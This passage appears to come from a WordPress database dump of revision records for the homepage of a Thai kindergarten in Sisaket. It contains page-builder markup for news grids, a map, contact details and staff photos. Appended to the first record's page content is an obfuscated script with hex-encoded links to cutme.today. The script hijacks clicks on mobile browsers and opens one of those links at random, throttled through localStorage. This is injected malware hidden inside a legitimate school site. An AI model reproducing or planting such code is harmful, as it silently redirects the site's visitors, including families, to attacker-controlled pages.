{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 14:51:19','2025-06-27 07:51:19','',19,'http://watprato.ssk.in.th/?p=569',0,'revision','',0),
(570,1,'2025-06-27 15:22:49','2025-06-27 08:22:49','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" 